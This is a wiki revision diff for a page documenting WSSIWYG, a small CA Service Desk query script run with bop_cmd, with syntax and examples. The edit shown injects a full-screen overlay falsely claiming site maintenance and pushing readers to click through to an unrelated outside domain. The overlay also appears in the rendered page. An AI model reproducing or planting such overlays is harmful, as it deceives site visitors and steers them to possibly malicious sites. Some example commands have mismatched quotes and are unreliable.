Difference between revisions of "WSSIWYG"

From SDU
Jump to: navigation, search
m
Line 1: Line 1:
 +
----
 +
<div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;">
 +
----
 +
=[http://ogetehuvo.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]=
 +
----
 +
=[http://ogetehuvo.co.cc CLICK HERE]=
 +
----
 +
</div>
 
__NOTOC__
 
__NOTOC__
 
{{Global Header}}
 
{{Global Header}}
Line 10: Line 18:
  
 
== Command Structure ==
 
== Command Structure ==
<source lang="text">bop_cmd -f ListObj.frg "ShowObjectDomset( object, where filter, DottedAttribute1, DottedAttribute2, DottedAttribute3, etc... )"</source>
+
&lt;source lang=&quot;text&quot;&gt;bop_cmd -f ListObj.frg &quot;ShowObjectDomset( object, where filter, DottedAttribute1, DottedAttribute2, DottedAttribute3, etc... )&quot;&lt;/source&gt;
  
'''object''' is the USD object name (ex: cr, in, wf, ...)<br>
+
'''object''' is the USD object name (ex: cr, in, wf, ...)&lt;br&gt;
'''where filter''' is a logical constraint on object attribute (ex: last_name='Neron')<br>
+
'''where filter''' is a logical constraint on object attribute (ex: last_name='Neron')&lt;br&gt;
 
'''DottedAttribute1, DottedAttribute2,...''' are the return values (ex: customer.admin_org.name)
 
'''DottedAttribute1, DottedAttribute2,...''' are the return values (ex: customer.admin_org.name)
  
 
== Examples ==
 
== Examples ==
<source lang="text">bop_cmd -f ListObj.frg "ShowObjectDomset( 'cr', 'id>2', 'ref_num', 'customer.combo_name')"
+
&lt;source lang=&quot;text&quot;&gt;bop_cmd -f ListObj.frg &quot;ShowObjectDomset( 'cr', 'id&gt;2', 'ref_num', 'customer.combo_name')&quot;
bop_cmd -f ListObj.frg "ShowObjectDomset( 'chg, 'description LIKE \'%test%\'', 'chg_ref_num', 'category.sym')"
+
bop_cmd -f ListObj.frg &quot;ShowObjectDomset( 'chg, 'description LIKE \'%test%\'', 'chg_ref_num', 'category.sym')&quot;
bop_cmd -f ListObj.frg "ShowObjectDomset( 'wf', 'status == \'PEND\', 'chg.chg_ref_num')"</source>
+
bop_cmd -f ListObj.frg &quot;ShowObjectDomset( 'wf', 'status == \'PEND\', 'chg.chg_ref_num')&quot;&lt;/source&gt;

Revision as of 03:21, 24 November 2010



Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page


CLICK HERE


To make corrections or additions to this article, select the edit tab above.
To discuss or ask questions about this article, select the discussion tab above.

Overview

What Servicedesk Sees Is What You Get This is a small tool developed by Nero Le Velu to see what USD see from the object point of view

Download ListObj.frg to your server.

Command Structure

<source lang="text">bop_cmd -f ListObj.frg "ShowObjectDomset( object, where filter, DottedAttribute1, DottedAttribute2, DottedAttribute3, etc... )"</source>

object is the USD object name (ex: cr, in, wf, ...)<br> where filter is a logical constraint on object attribute (ex: last_name='Neron')<br> DottedAttribute1, DottedAttribute2,... are the return values (ex: customer.admin_org.name)

Examples

<source lang="text">bop_cmd -f ListObj.frg "ShowObjectDomset( 'cr', 'id>2', 'ref_num', 'customer.combo_name')" bop_cmd -f ListObj.frg "ShowObjectDomset( 'chg, 'description LIKE \'%test%\, 'chg_ref_num', 'category.sym')" bop_cmd -f ListObj.frg "ShowObjectDomset( 'wf', 'status == \'PEND\', 'chg.chg_ref_num')"</source>